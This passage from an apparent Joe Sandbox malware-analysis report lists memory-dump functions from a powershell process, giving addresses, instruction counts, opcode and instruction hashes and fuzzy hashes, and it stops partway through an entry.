                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7a0e3df3994bbdb279544155f2dd284a7b2909547f8fb1f47b1f2e5066d75715
                              • Instruction ID: 9bd657d5750f8497c36fd2db340b9cfff91c55ee5dee5a2f866bd9115620c725
                              • Opcode Fuzzy Hash: 7a0e3df3994bbdb279544155f2dd284a7b2909547f8fb1f47b1f2e5066d75715
                              • Instruction Fuzzy Hash: 56216034A001089FCB68AFA4D855BEEBBF5EB4C310F144429E502B7791DB709D45CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DD528 Relevance: .1, Instructions: 61COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 730390d694352389fc05b35931a9da7bdb6015132f0db233e9d0502d07b3aa66
                              • Instruction ID: 482b8e2c88e3d1a9e8327d4be09b1c638882fc98b1e9fdab57c9747ef76b1776
                              • Opcode Fuzzy Hash: 730390d694352389fc05b35931a9da7bdb6015132f0db233e9d0502d07b3aa66
                              • Instruction Fuzzy Hash: A11108327042245FE7549BB9E8487BBB7EAEBC4325F05847AE209C3781CFB59C418790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 068D3912 Relevance: .1, Instructions: 61COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ae5857e3910680d7cddc4d3735a7bf2bcdfc9dc4a4eaf8a5f320665ed25fee56
                              • Instruction ID: ebf0b55872bf8ed965cffd2a4aaa850b1d1ddaf59ec8e5ca1efba43de8a0bb36
                              • Opcode Fuzzy Hash: ae5857e3910680d7cddc4d3735a7bf2bcdfc9dc4a4eaf8a5f320665ed25fee56
                              • Instruction Fuzzy Hash: FA118E30E002098FCB84DFB8D841AEEBBF6FF89314F548569D515EB251DB30A905CBA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D655E Relevance: .1, Instructions: 59COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a2ffaad96450df64261b414edfc59396bebb29142ca0f9ce3445e0fc27ec0046
                              • Instruction ID: f3d0a522da66a79d8a4db066f7e788e0aa25057256abe1083a44d63f3eba2601
                              • Opcode Fuzzy Hash: a2ffaad96450df64261b414edfc59396bebb29142ca0f9ce3445e0fc27ec0046
                              • Instruction Fuzzy Hash: 35112B75E00208DFCB04DFA9D885AEEBBF6EB8C310B14852AF905E3351DB7169158BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D6E28 Relevance: .1, Instructions: 59COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6702090fcdb05be98f14988b6757cbc8c6b78c97ebe8beefbe6f33ef7d7e2d3b
                              • Instruction ID: 72df3a0b9eca8da8cfe08f6b2b2f98d3dc5fc0ce884517e0c0e45a69356e4f80
                              • Opcode Fuzzy Hash: 6702090fcdb05be98f14988b6757cbc8c6b78c97ebe8beefbe6f33ef7d7e2d3b
                              • Instruction Fuzzy Hash: 18117C356007059FC710CF68D884E9ABBF6FF89310B158A99E8499B7A2D670FD05CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D4CF8 Relevance: .1, Instructions: 58COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9452d5be23be7770f4d1e91e94c274a1c9cd3abf9d840718fb69f4aebe44e9e9
                              • Instruction ID: cdb447fee5b14adf1f329b4ece3809abe916d07367ea9336e0c1be2169e9bc29
                              • Opcode Fuzzy Hash: 9452d5be23be7770f4d1e91e94c274a1c9cd3abf9d840718fb69f4aebe44e9e9
                              • Instruction Fuzzy Hash: 20117C30A102048BDB64DB64C9197AE7BF6AF88710F3004AAE506EB7A6DE719D01CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D6668 Relevance: .1, Instructions: 57COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 660b44a368b5a04678d79ab39e526be9f70427492cc0c3e0a67a35e1d4d7be8a
                              • Instruction ID: 9bf4fef7696f76367b473a82a59d4d3ebd2f67b1d7216f7456f61a83440aea2b
                              • Opcode Fuzzy Hash: 660b44a368b5a04678d79ab39e526be9f70427492cc0c3e0a67a35e1d4d7be8a
                              • Instruction Fuzzy Hash: 77012239309344AFCB111A388819BAB3FA98F82600F0484AAF559CB391EA39C945C7B4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 068D4818 Relevance: .1, Instructions: 56COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 26892a7943d53a21bc5ce5bc94005ac78a3ae8c69538b67a98b5a496203aa54a
                              • Instruction ID: 6db50633b91e7424c9ace91e8f908c8508623e3203ebd867c0315e0d642fcd4a
                              • Opcode Fuzzy Hash: 26892a7943d53a21bc5ce5bc94005ac78a3ae8c69538b67a98b5a496203aa54a
                              • Instruction Fuzzy Hash: 4201B531F94A604BEB609E79D4407BA73D89B403E5F0844B6EA0DD7691D635D84083E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D46DE Relevance: .1, Instructions: 55COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d6dce0206334c3ce2ddb290a66b530a5490657f74e65948399098d47b5d331c5
                              • Instruction ID: 3a9f6265d8a525c49144fb1eda0bb22123e5f8937f6c9f2b9b1e63a96c872f99
                              • Opcode Fuzzy Hash: d6dce0206334c3ce2ddb290a66b530a5490657f74e65948399098d47b5d331c5
                              • Instruction Fuzzy Hash: 7411ED30B063546FD7119BA89C05BFF7BB5AB86710F1400A6FA54AF2D6CBB04906C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D7770 Relevance: .1, Instructions: 54COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 13e9074539e4db90e53e05877c56fe8438aa80d689f48ea0f2f01202d31fd892
                              • Instruction ID: 851b657da02ae2eea6afcf1992ea04a9095e510899d8713bb7dbcbe20104124e
                              • Opcode Fuzzy Hash: 13e9074539e4db90e53e05877c56fe8438aa80d689f48ea0f2f01202d31fd892
                              • Instruction Fuzzy Hash: 24112135A001089FCB58AFA4D854BAEBBF5EB4C311F149429D502B7751DA709C45CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D6568 Relevance: .1, Instructions: 54COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f56c54599b698281617fa2315ee7e9f4dbe69fccb6c3444151f94a741b89468f
                              • Instruction ID: 84ad3a1a4da6b4c7bc9ae01359d77cc1bc95f146d164a377e4e1e135cdb23c7c
                              • Opcode Fuzzy Hash: f56c54599b698281617fa2315ee7e9f4dbe69fccb6c3444151f94a741b89468f
                              • Instruction Fuzzy Hash: 64114F71E002089FCB04DFA9D4859EEBBF6EB8C310B14852AF905E3351DB306D058FA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D6E38 Relevance: .1, Instructions: 54COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 671106642c7d4a1d0be45942550a4c4a89301932c6a56d1cdeb6dc802f277cab
                              • Instruction ID: 947584bde77304c47c757f81ab894f1d93a66241fe0b313d6d56a66846263234
                              • Opcode Fuzzy Hash: 671106642c7d4a1d0be45942550a4c4a89301932c6a56d1cdeb6dc802f277cab
                              • Instruction Fuzzy Hash: D71166756002059FC710DF68D881EAAFBF6FB88710B048A58E94A9B361D770FC04CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DEED7 Relevance: .1, Instructions: 54COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 94f1d59539f3c31dd66d9d4b786648ef81c937336bcfff4f49075a85a00d6405
                              • Instruction ID: c2b4d2c6680ea877b0f55a56a3d4979577ce25a803f24127c25f471c52d09813
                              • Opcode Fuzzy Hash: 94f1d59539f3c31dd66d9d4b786648ef81c937336bcfff4f49075a85a00d6405
                              • Instruction Fuzzy Hash: F8014971B409008FC7991A28FE4837D33B3BBA8A25F54AD29E513877C4DB3859424AC1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D3E1A Relevance: .1, Instructions: 53COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e6bb55b58e869d87a85f44ecbcf55c54af32cd50e03ad77ed3321aebefe0d6a3
                              • Instruction ID: 549b27e27824875f75fac6915e3a0ab68b816d4a3f7ff8198761fc34e41570bd
                              • Opcode Fuzzy Hash: e6bb55b58e869d87a85f44ecbcf55c54af32cd50e03ad77ed3321aebefe0d6a3
                              • Instruction Fuzzy Hash: FC11E171A063946BD7119B689C08BBFBF71AB82711F5845AAE544AF2C3CB704905C7A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DA8C0 Relevance: .1, Instructions: 53COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f4b547ed94619b846fd5f0082865383177a2a04ba9f8f073dafb4e844a67e9f4
                              • Instruction ID: 0f6823b6291b151db3c59e972fe3169314029d129cd0a1b85acdbc552b7fd498
                              • Opcode Fuzzy Hash: f4b547ed94619b846fd5f0082865383177a2a04ba9f8f073dafb4e844a67e9f4
                              • Instruction Fuzzy Hash: 321108321107058BC350DB38D88268977D6EF81308B048E6ED1568F6B9EFB57D0987D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 068D4808 Relevance: .0, Instructions: 50COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440650410.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_68d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 12a4b99e865432ab4aa515eaad115fe34827991a4c49034cc8ddfc8c366b72b3
                              • Instruction ID: 2e919d6212252915839170d5db919d682c0686ef0e8d09cecd91327716c87156
                              • Opcode Fuzzy Hash: 12a4b99e865432ab4aa515eaad115fe34827991a4c49034cc8ddfc8c366b72b3
                              • Instruction Fuzzy Hash: B1012430F8A7A09FDB718E24C844B7A7BD89F002D0F0944A9E945DB292CB34DC4083F2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D0040 Relevance: .0, Instructions: 49COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 32b8843dff8bb9fcad880161f3c52a4f3325084fee074e6153de2f7378ae4f8e
                              • Instruction ID: 29be4f1fccc18a7d1272390a8c9a6204e233957920eafb3f1767b75befe4b94a
                              • Opcode Fuzzy Hash: 32b8843dff8bb9fcad880161f3c52a4f3325084fee074e6153de2f7378ae4f8e
                              • Instruction Fuzzy Hash: DE01C031B013065BCB00DE68D8409AFB7E6EF85350F004879E909AB340EF35AD018BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D003E Relevance: .0, Instructions: 48COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9ddcca74cd42924d0d8fe0a5108b50e6b29a340186566adcfaad3255fa200755
                              • Instruction ID: eada72420a2ebdccd148c0f2da889fe3c9a33df0063e03e7dbaf44bd1200e329
                              • Opcode Fuzzy Hash: 9ddcca74cd42924d0d8fe0a5108b50e6b29a340186566adcfaad3255fa200755
                              • Instruction Fuzzy Hash: 2201C031B012068BCB00DE68D8409AF73E6EF85351F144879E909AB340EF34AD068B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D46F0 Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b34fced405e241ba3932a531bab0304dd4df87bc0cf5ff9667b5d1762b5a8041
                              • Instruction ID: 7f3a2615afcaf2ef09236dbf2eaf359b7daa510b767998152a97b75586427b26
                              • Opcode Fuzzy Hash: b34fced405e241ba3932a531bab0304dd4df87bc0cf5ff9667b5d1762b5a8041
                              • Instruction Fuzzy Hash: C501F270F013546BE7109B98DC04BBFBBB6EB85B10F64007AEA14AF2C6CBB05905C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D3E28 Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2a3d0f48d857c6532264a92e0e212b0ad89e1707c517223c92e6d38e42c39f56
                              • Instruction ID: 205156f5e5d28f44d4b1c02a94ff9352fff0cefb12b7491ca3e192806051cba7
                              • Opcode Fuzzy Hash: 2a3d0f48d857c6532264a92e0e212b0ad89e1707c517223c92e6d38e42c39f56
                              • Instruction Fuzzy Hash: 9301A271F013546BE7109B98DC05BBFBBB5AB85B10F644476EA04AF2C6CBB05905C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D6658 Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ba4c270e09b7e2ff8e0a66314abc2e1a4dfc04b3c9358e5606518c75779f803c
                              • Instruction ID: deb1b49173da578be698077f42f629e10913e3def28b93c228a079bbc882ddfc
                              • Opcode Fuzzy Hash: ba4c270e09b7e2ff8e0a66314abc2e1a4dfc04b3c9358e5606518c75779f803c
                              • Instruction Fuzzy Hash: B7F0FF36206351AFC7609E249C14FBB7FA98F85640F08859FF8598B291D671CA00CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D0150 Relevance: .0, Instructions: 42COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 059b829fd1d6cb2fddbcbccd8746ff1ba738c16168b956f315c84418d761313d
                              • Instruction ID: 8f79b01e940f7ef55f027ba8f3a5a6bd8ab37cf68d4fb2fbb04b5667032ee1f8
                              • Opcode Fuzzy Hash: 059b829fd1d6cb2fddbcbccd8746ff1ba738c16168b956f315c84418d761313d
                              • Instruction Fuzzy Hash: 39F050297043542FD718A7744C50AF72AD78FC6580705D576B205CB346DD344D4D43D4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D7DA8 Relevance: .0, Instructions: 40COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 25485f9cdfbba720fc2c08c06a75003083ab8284506466c788049aec88369bfa
                              • Instruction ID: 696d05efa20e1e3f5f1fd082837c5429df4e9a5c0af6a3a7aa8e466f8498fa84
                              • Opcode Fuzzy Hash: 25485f9cdfbba720fc2c08c06a75003083ab8284506466c788049aec88369bfa
                              • Instruction Fuzzy Hash: 8201D6312482549FD740CF58D85496FBFE6EFC9220B08806AF918CB352C635DD52CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DBC8C Relevance: .0, Instructions: 37COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f84e4394a4a1ab87312581ebe39f1761bff94607399c3a2cf864a3b6355a2386
                              • Instruction ID: 276fcec04ef8652c26fd7bee3ea7a43c709fa15c2e3e8d5a8ce5ccc6870bc89d
                              • Opcode Fuzzy Hash: f84e4394a4a1ab87312581ebe39f1761bff94607399c3a2cf864a3b6355a2386
                              • Instruction Fuzzy Hash: 00016D36A041589FCB40DF68E8409DDFBF1EF89260B04C496ED1993211C7319A25CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DD4D8 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1ddbd7b44ed6663ac2491d101febc8f2e44139e7b514e4567d3d241be89c976a
                              • Instruction ID: df2bfed3e0aa4be8537086f7149c53b2524726b5abc21ad818c44f2fc4de7ebc
                              • Opcode Fuzzy Hash: 1ddbd7b44ed6663ac2491d101febc8f2e44139e7b514e4567d3d241be89c976a
                              • Instruction Fuzzy Hash: EBE04F377141140B2B58DABFB8045BF7BDBDEC4576318883BEA0DC2640EE6588064394
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D5C68 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d712ffc5464aa2c2c285e2f9abd2df69bb53a08ce781459078acb236e8e87a06
                              • Instruction ID: eebde43392fe7cda026afe04c1fbeb329b13d042e5048a79a580bb5cfb984b7b
                              • Opcode Fuzzy Hash: d712ffc5464aa2c2c285e2f9abd2df69bb53a08ce781459078acb236e8e87a06
                              • Instruction Fuzzy Hash: A4F01CBA905256AFD3018A55EC85C93FF79FA8A26131A4796F5489B302D231AC81C7F0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DB3D0 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cbe20ec55ed90257dea99fb4f3162ddf78cbf4fd60be8941d2feb2a4e1d2652a
                              • Instruction ID: 07ce388237e0bb9baa4042da7e99ff9ec3c7d4c09a0d12f960bb5afcedbd9406
                              • Opcode Fuzzy Hash: cbe20ec55ed90257dea99fb4f3162ddf78cbf4fd60be8941d2feb2a4e1d2652a
                              • Instruction Fuzzy Hash: 65F0BB317046809FE3169B28D4087B77BE6EFC5305F1988FDE0894BA86CBB5D842C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D0160 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a4363ec4bbc4c2dc4fd8aad08f9720fa298fd4e9e48cb9a5b6286757b457cf72
                              • Instruction ID: 6bd33168ba662f3d1584c06be7e9e56222dd972bf40fe55aad296a48ed303d36
                              • Opcode Fuzzy Hash: a4363ec4bbc4c2dc4fd8aad08f9720fa298fd4e9e48cb9a5b6286757b457cf72
                              • Instruction Fuzzy Hash: 89E0221AB403281BEB08A27808507BB25CB8BC5894B45D47AA30ACB385EE389D4E53C0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067DB3E0 Relevance: .0, Instructions: 29COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4cd11254313bc46d2581dd41ce6ba2ecd8ec8c20f7d0bd44e8186c205f70f658
                              • Instruction ID: c8f454bea4978727c02ca551cad916f346299929bb2cb4fd6d7c1e270e64e048
                              • Opcode Fuzzy Hash: 4cd11254313bc46d2581dd41ce6ba2ecd8ec8c20f7d0bd44e8186c205f70f658
                              • Instruction Fuzzy Hash: 71F0EC307002408FE3299A18D448B7737E6EBC9715F1A48BDE0494B781CFB4D841C750
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D9120 Relevance: .0, Instructions: 29COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 789c6238244f1b5a28a134f502acff375b49b5f0164f486e6d64841246a4d9e5
                              • Instruction ID: 57227b969e8505cfcafc2f1be958cb14faba9aac773a705081ab436746e4943b
                              • Opcode Fuzzy Hash: 789c6238244f1b5a28a134f502acff375b49b5f0164f486e6d64841246a4d9e5
                              • Instruction Fuzzy Hash: 03E06C36304118AF47049A99DC4085EF7EAFBC9664314852EF50997310CB719C0187E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D07F0 Relevance: .0, Instructions: 28COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 869516bb1622a3fb250ebc0b9165f94e56226d46d36e96d4352159a2aaab728c
                              • Instruction ID: d567f80b3beaa7807b63cc99ad3e94f14d2a8dba056e612249e8bb714ae5c903
                              • Opcode Fuzzy Hash: 869516bb1622a3fb250ebc0b9165f94e56226d46d36e96d4352159a2aaab728c
                              • Instruction Fuzzy Hash: 2AE0D1322101086BC304E6BAEC81DA977DFEFC5754744497AF208C7121DF61BD4687E4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D0E70 Relevance: .0, Instructions: 26COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7db18938881e48af74e8d6faff48cdfcb311cd0e22161d8a73ca4b7e576b8a82
                              • Instruction ID: 121cf57e8f9fc9724a24f56a00c86cbd412be7f029b240859c05c85ab1f26386
                              • Opcode Fuzzy Hash: 7db18938881e48af74e8d6faff48cdfcb311cd0e22161d8a73ca4b7e576b8a82
                              • Instruction Fuzzy Hash: C5E068213812810FD305A270AC24BAB37E78BC5314F4600BAD209D7383ED115D1543D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067D8D11 Relevance: .0, Instructions: 24COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000001F.00000002.440220248.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_31_2_67d0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
